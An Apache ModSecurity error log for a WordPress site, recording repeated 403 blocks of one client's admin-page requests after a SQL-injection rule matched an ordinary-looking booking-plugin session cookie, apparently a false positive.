[Mon May 11 22:25:09.023815 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI7JXo_DFxNSZVmaX3PYQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:09.024149 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI7JXo_DFxNSZVmaX3PYQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:09.602468 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7JXo_DFxNSZVmaX3PYQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:10.043296 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI7Jno_DFxNSZVmaX3PYwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:10.043580 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI7Jno_DFxNSZVmaX3PYwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:10.423438 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7Jno_DFxNSZVmaX3PYwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:11.146949 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI7J3o_DFxNSZVmaX3PZQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:11.147227 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI7J3o_DFxNSZVmaX3PZQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:11.744873 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7J3o_DFxNSZVmaX3PZQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:12.343343 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI7KHo_DFxNSZVmaX3PZwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:12.343615 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI7KHo_DFxNSZVmaX3PZwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:12.930677 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7KHo_DFxNSZVmaX3PZwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:13.351533 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI7KXo_DFxNSZVmaX3PaQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:13.351810 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI7KXo_DFxNSZVmaX3PaQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:14.024379 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7KXo_DFxNSZVmaX3PaQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:14.734399 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI7Kno_DFxNSZVmaX3PbAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:14.734684 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI7Kno_DFxNSZVmaX3PbAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:15.301298 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7Kno_DFxNSZVmaX3PbAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:15.653349 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI7K3o_DFxNSZVmaX3PbQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:15.653666 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI7K3o_DFxNSZVmaX3PbQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:16.209992 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7K3o_DFxNSZVmaX3PbQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:16.528986 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI7LHo_DFxNSZVmaX3PbwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:16.529280 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI7LHo_DFxNSZVmaX3PbwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:16.910988 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7LHo_DFxNSZVmaX3PbwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:17.535543 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI7LXo_DFxNSZVmaX3PcQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:17.535841 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI7LXo_DFxNSZVmaX3PcQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:18.161853 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7LXo_DFxNSZVmaX3PcQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:18.541693 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI7Lno_DFxNSZVmaX3PcwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:18.542073 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI7Lno_DFxNSZVmaX3PcwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:19.155929 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7Lno_DFxNSZVmaX3PcwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:19.934716 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI7L3o_DFxNSZVmaX3PdgAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:19.935003 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI7L3o_DFxNSZVmaX3PdgAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:20.567759 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7L3o_DFxNSZVmaX3PdgAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:20.952687 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI7MHo_DFxNSZVmaX3PeAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:20.952963 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI7MHo_DFxNSZVmaX3PeAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:21.508195 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7MHo_DFxNSZVmaX3PeAAAANA"], referer: https://rentparadise.fr/wp-login.php
